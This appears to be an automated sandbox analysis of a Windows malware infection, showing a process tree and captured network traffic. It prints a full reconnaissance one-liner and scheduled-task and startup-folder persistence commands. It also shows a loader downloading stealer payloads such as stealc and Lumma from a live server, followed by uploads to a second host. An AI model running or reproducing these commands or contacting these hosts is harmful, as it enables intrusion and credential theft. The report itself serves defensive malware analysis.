- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:4396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"6⤵
- Network Service Discovery
PID:2756 -
C:\Windows\system32\systeminfo.exesysteminfo7⤵
- Gathers system information
PID:3180
-
-
C:\Windows\system32\HOSTNAME.EXEhostname7⤵PID:4160
-
-
C:\Windows\System32\Wbem\WMIC.exewmic logicaldisk get caption,description,providername7⤵
- Collects information from the system
PID:4888
-
-
C:\Windows\system32\net.exenet user7⤵PID:4184
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user8⤵PID:4652
-
-
-
C:\Windows\system32\query.exequery user7⤵PID:716
-
C:\Windows\system32\quser.exe"C:\Windows\system32\quser.exe"8⤵PID:3520
-
-
-
C:\Windows\system32\net.exenet localgroup7⤵PID:1996
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup8⤵PID:1564
-
-
-
C:\Windows\system32\net.exenet localgroup administrators7⤵PID:1444
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators8⤵PID:3772
-
-
-
C:\Windows\system32\net.exenet user guest7⤵PID:2804
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user guest8⤵PID:2444
-
-
-
C:\Windows\system32\net.exenet user administrator7⤵PID:4976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user administrator8⤵PID:3152
-
-
-
C:\Windows\System32\Wbem\WMIC.exewmic startup get caption,command7⤵PID:3168
-
-
C:\Windows\system32\tasklist.exetasklist /svc7⤵
- Enumerates processes with tasklist
PID:1252
-
-
C:\Windows\system32\ipconfig.exeipconfig /all7⤵
- Gathers network information
PID:3708
-
-
C:\Windows\system32\ROUTE.EXEroute print7⤵PID:2748
-
-
C:\Windows\system32\ARP.EXEarp -a7⤵
- Network Service Discovery
PID:5096
-
-
C:\Windows\system32\NETSTAT.EXEnetstat -ano7⤵
- System Network Connections Discovery
- Gathers network information
PID:2848
-
-
C:\Windows\system32\sc.exesc query type= service state= all7⤵
- Launches sc.exe
PID:976
-
-
C:\Windows\system32\netsh.exenetsh firewall show state7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:4320
-
-
C:\Windows\system32\netsh.exenetsh firewall show config7⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
PID:1856
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:3872
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:1516
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"6⤵PID:408
-
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid7⤵PID:1564
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000179001\SеtuÑ€111.exe"C:\Users\Admin\AppData\Local\Temp\1000179001\SеtuÑ€111.exe"4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Checks processor information in registry
PID:3920 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3920 -s 9285⤵
- Program crash
PID:1620
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000183001\surfex.exe"C:\Users\Admin\AppData\Local\Temp\1000183001\surfex.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
PID:4308 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"5⤵
- System Location Discovery: System Language Discovery
PID:3992
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F2⤵
- System Location Discovery: System Language Discovery
PID:2008 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Invitations" /tr "wscript //B 'C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js'" /sc minute /mo 5 /F3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & echo URL="C:\Users\Admin\AppData\Local\NeuraMind Innovations\MindLynx.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MindLynx.url" & exit2⤵
- Drops startup file
- System Location Discovery: System Language Discovery
PID:3184
-
-
C:\Users\Admin\AppData\Local\Temp\297145\Cultures.pifC:\Users\Admin\AppData\Local\Temp\297145\Cultures.pif2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4516 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 10883⤵
- Program crash
PID:3760
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4516 -s 6803⤵
- Program crash
PID:1864
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2520 -ip 25201⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:768
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 2360 -ip 23601⤵PID:1188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1688 -ip 16881⤵PID:4848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4516 -ip 45161⤵PID:3000
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4516 -ip 45161⤵PID:1996
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 748 -ip 7481⤵PID:3752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4516 -ip 45161⤵PID:1920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2780 -ip 27801⤵PID:1512
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2780 -ip 27801⤵PID:2988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2780 -ip 27801⤵PID:4480
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 2780 -ip 27801⤵PID:3988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 2780 -ip 27801⤵PID:2752
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 2780 -ip 27801⤵PID:2728
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 2780 -ip 27801⤵PID:3900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2780 -ip 27801⤵PID:1364
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 2780 -ip 27801⤵PID:2508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 2780 -ip 27801⤵PID:4908
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 2780 -ip 27801⤵PID:3548
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4184 -ip 41841⤵PID:2504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 840 -ip 8401⤵PID:2396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 840 -ip 8401⤵PID:2272
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 840 -ip 8401⤵PID:2524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 840 -ip 8401⤵PID:1608
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 840 -ip 8401⤵PID:4500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 840 -ip 8401⤵PID:4948
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 840 -ip 8401⤵PID:920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 840 -ip 8401⤵PID:864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 840 -ip 8401⤵PID:3200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 840 -ip 8401⤵PID:2920
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 840 -ip 8401⤵PID:4960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 840 -ip 8401⤵PID:2428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 840 -ip 8401⤵PID:2328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 356 -p 3920 -ip 39201⤵PID:2428
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4184 -ip 41841⤵PID:3364
-
C:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exeC:\Users\Admin\AppData\Local\Temp\fed0c9a4d3\Hkbsse.exe1⤵
- Executes dropped EXE
PID:1064 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 4682⤵
- Program crash
PID:3756
-
-
C:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exeC:\Users\Admin\AppData\Local\Temp\44111dbc49\axplong.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3796
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1064 -ip 10641⤵PID:4128
Network
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 4
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 160
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/GOLD.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:50 GMT
Content-Type: application/octet-stream
Content-Length: 330792
Last-Modified: Sun, 18 Aug 2024 13:17:05 GMT
Connection: keep-alive
ETag: "66c1f451-50c28"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/crypteda.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:51 GMT
Content-Type: application/octet-stream
Content-Length: 1104936
Last-Modified: Mon, 19 Aug 2024 12:56:48 GMT
Connection: keep-alive
ETag: "66c34110-10dc28"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/stealc_default.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:54 GMT
Content-Type: application/octet-stream
Content-Length: 192000
Last-Modified: Fri, 02 Aug 2024 14:34:23 GMT
Connection: keep-alive
ETag: "66acee6f-2ee00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/clcs.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:55 GMT
Content-Type: application/octet-stream
Content-Length: 6642843
Last-Modified: Thu, 22 Aug 2024 19:16:51 GMT
Connection: keep-alive
ETag: "66c78ea3-655c9b"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/14082024.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:07 GMT
Content-Type: application/octet-stream
Content-Length: 311296
Last-Modified: Wed, 14 Aug 2024 16:49:43 GMT
Connection: keep-alive
ETag: "66bce027-4c000"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:08 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/BattleGermany.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:08 GMT
Content-Type: application/octet-stream
Content-Length: 8729379
Last-Modified: Fri, 16 Aug 2024 12:51:32 GMT
Connection: keep-alive
ETag: "66bf4b54-853323"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:26 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/runtime.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:26 GMT
Content-Type: application/octet-stream
Content-Length: 1146632
Last-Modified: Sat, 10 Aug 2024 22:51:40 GMT
Connection: keep-alive
ETag: "66b7eefc-117f08"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:31 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/coreplugin.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:31 GMT
Content-Type: application/octet-stream
Content-Length: 1190888
Last-Modified: Mon, 19 Aug 2024 13:07:49 GMT
Connection: keep-alive
ETag: "66c343a5-122be8"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:38 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/Indentif.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:38 GMT
Content-Type: application/octet-stream
Content-Length: 10589696
Last-Modified: Fri, 23 Aug 2024 13:52:36 GMT
Connection: keep-alive
ETag: "66c89424-a19600"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/LummaC22222.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:57 GMT
Content-Type: application/octet-stream
Content-Length: 264704
Last-Modified: Wed, 21 Aug 2024 13:05:41 GMT
Connection: keep-alive
ETag: "66c5e625-40a00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:56:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:22 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/S%D0%B5tu%D1%80111.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:23 GMT
Content-Type: application/octet-stream
Content-Length: 6675527
Last-Modified: Thu, 22 Aug 2024 11:09:13 GMT
Connection: keep-alive
ETag: "66c71c59-65dc47"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:33 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:185.215.113.16:80RequestGET /inc/surfex.exe HTTP/1.1
Host: 185.215.113.16
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:33 GMT
Content-Type: application/octet-stream
Content-Length: 317952
Last-Modified: Fri, 23 Aug 2024 13:54:19 GMT
Connection: keep-alive
ETag: "66c8948b-4da00"
Accept-Ranges: bytes
-
Remote address:185.215.113.16:80RequestPOST /Jo89Ku7d/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 185.215.113.16
Content-Length: 31
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:57:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
-
Remote address:8.8.8.8:53Request16.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request8.8.8.8.in-addr.arpaIN PTRResponse8.8.8.8.in-addr.arpaIN PTRdnsgoogle
-
Remote address:8.8.8.8:53Request21.163.179.95.in-addr.arpaIN PTRResponse21.163.179.95.in-addr.arpaIN PTR9517916321vultrusercontentcom
-
Remote address:8.8.8.8:53Request223.18.216.154.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request51.18.21.65.in-addr.arpaIN PTRResponse51.18.21.65.in-addr.arpaIN PTRstatic51182165clientsyour-serverde
-
Remote address:8.8.8.8:53Requestctldl.windowsupdate.comIN AResponsectldl.windowsupdate.comIN CNAMEctldl.windowsupdate.com.delivery.microsoft.comctldl.windowsupdate.com.delivery.microsoft.comIN CNAMEwu-b-net.trafficmanager.netwu-b-net.trafficmanager.netIN CNAMEdownload.windowsupdate.com.edgesuite.netdownload.windowsupdate.com.edgesuite.netIN CNAMEa767.dspw65.akamai.neta767.dspw65.akamai.netIN A2.22.144.81a767.dspw65.akamai.netIN A2.22.144.73
-
Remote address:8.8.8.8:53Request17.113.215.185.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestfivexx5ht.topIN AResponsefivexx5ht.topIN A195.133.48.136
-
Remote address:8.8.8.8:53RequestjSbXVBiItIINfreBHvLPHxDRe.jSbXVBiItIINfreBHvLPHxDReIN AResponse
-
Remote address:8.8.8.8:53Request34.202.67.172.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestx1.c.lencr.orgIN AResponsex1.c.lencr.orgIN CNAMEcrl.root-x1.letsencrypt.org.edgekey.netcrl.root-x1.letsencrypt.org.edgekey.netIN CNAMEe8652.dscx.akamaiedge.nete8652.dscx.akamaiedge.netIN A95.100.245.168
-
Remote address:8.8.8.8:53Request171.174.248.89.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestdeicedosmzj.shopIN AResponsedeicedosmzj.shopIN A172.67.210.90deicedosmzj.shopIN A104.21.69.161
-
Remote address:8.8.8.8:53Requestdeicedosmzj.shopIN A
-
Remote address:154.216.18.223:80RequestGET /setup2.exe HTTP/1.1
Host: 154.216.18.223
ResponseHTTP/1.1 200 OK
Date: Fri, 23 Aug 2024 13:55:52 GMT
Content-Type: application/octet-stream
Content-Length: 358912
Last-Modified: Fri, 23 Aug 2024 11:05:54 GMT
Connection: keep-alive
ETag: "66c86d12-57a00"
Accept-Ranges: bytes
-
Remote address:185.215.113.17:80RequestGET / HTTP/1.1
Host: 185.215.113.17
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDBKFHIJKJKECAAAECAE
Host: 185.215.113.17
Content-Length: 214
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 180
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAE
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 1520
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----IDBFHJDAAFBAKEBGIJKK
Host: 185.215.113.17
Content-Length: 267
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 7116
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----BKFBAKFCBFHIJJJJDBFC
Host: 185.215.113.17
Content-Length: 268
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 108
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GIEHIDHJDBFIIECAKECB
Host: 185.215.113.17
Content-Length: 4735
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/sqlite3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT
ETag: "10e436-5e7ec6832a180"
Accept-Ranges: bytes
Content-Length: 1106998
Content-Type: application/x-msdos-program
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBKEHJEGCFBFHJJKJEHD
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestPOST /2fb6c2cc8dce150a.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAE
Host: 185.215.113.17
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache
ResponseHTTP/1.1 200 OK
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
-
Remote address:185.215.113.17:80RequestGET /f1ddeb6592c03206/freebl3.dll HTTP/1.1
Host: 185.215.113.17
Cache-Control: no-cache
